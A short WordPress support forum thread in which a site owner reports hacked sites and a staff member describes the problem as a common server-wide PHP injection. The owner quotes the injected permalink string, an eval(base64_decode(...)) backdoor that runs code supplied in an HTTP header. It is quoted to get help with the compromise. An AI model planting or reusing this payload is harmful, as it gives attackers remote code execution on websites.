Forums

Permalinks messed up - same problem occurred 10-12 months ago (2 posts)

  1. orangjul
    Member
    Posted 1 year ago #

    Several months ago we had a problem with sites being hacked and this code (or similar) being added to the end of permalinks:

    /%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/

    We upgraded all our sites to the latest version, upped permissions on our servers, removed suspicious subscribers, etc. We also made it a best practice to not use the default username of "admin" and made something unique. I believe at the time this was happening on WP 2.7 or 2.8.

    Today I discovered it on a site currently on 3.0. I'm reading this thread currently but don't know how relevant it is at this point: http://wordpress.org/support/topic/wp-adding-code-to-the-end-of-url-links-breaking-them?replies=67

    Has anyone else run into this recently???

  2. James
    Happiness Engineer
    Posted 1 year ago #

    It's unfortunately a common hack where a compromised account on your server is used to inject code into PHP files (not just WordPress) across the entire server.

    Remain calm and carefully follow this guide. When you're done, you may want to implement some (if not all) of the recommended security measures.

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags

No tags yet.